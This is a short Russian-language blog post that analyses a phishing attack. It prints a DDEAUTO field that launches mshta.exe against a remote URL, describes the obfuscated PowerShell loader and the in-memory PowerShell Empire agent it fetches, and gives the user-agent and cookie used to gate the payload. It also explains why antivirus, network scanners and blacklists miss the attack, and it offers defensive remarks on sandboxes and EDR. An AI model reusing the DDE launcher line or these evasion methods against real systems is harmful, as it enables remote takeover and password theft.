Пользователь увидит такое окно, т.к. внутри DDE ссылка
Если кликнет "yes" ссылка запустится и мелькнет окно браузера
DDEAUTO C:\\Program\\Microsoft\\Office\\Outlook.exe\\..\\..\\..\\..\\windows\\system32\\mshta.exe https://cdn03..../Calendar/Office.css "calendar"По ссылке завёрнутый в base64 обфуцированный powershell скрипт,
который отключает логирование и загружает закодированный руткит. Руткит можно получить только если юзерагент равен "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0);" и есть куки "session=QishMRJiuJ6KvsoMj383FYyGPP8=".
Руткит - это кастомно-обфуцированный агент PowerShell Empire, который дает полный удаленный доступ к компьютеру, достает пароль пользователя, позволяет делать скриншоты и т.д. Агент находится целиком в памяти, на диск ничего не записывается, поэтому традиционные антивирусы его не заметят.
Полностью пропатченный Windows 10 x64 со свежим топ5 антивирусом ничего не заметит. Сетевые средства безопасности будут молчать (все хосты, юзер-агенты и сетевые пакеты белые и пушистые). Сетевые фаил-сканнеры (типа Cisco AMP) даже если и умеют смотреть в HTTPS траффик, то ничего там не увидят т.к. файлы обфуцированы/закодированы. Хорошая песочница должна помочь, но только до того момента, как плохие парни встроят в свои скрипты процедуры детекта песочниц. Продвинутые endpoint решения типа Carbon Black, Cylance должны подозрительный PowerShell поймать, но применение NextGen AV решений требует очень зрелой службы ИБ и вагон времени на тюнинг и уменьшение ложных срабатываний.
Ещё один растущий тренд у плохих парней - прокаченный DevOps. Промежуточные сервера и с2 могут подниматься скриптами и меняться несколько раз в течении одной фишинговой кампании, что делает blacklist подход и репутационные фильтры малоэфективными.
Комментариев нет:
Отправить комментарий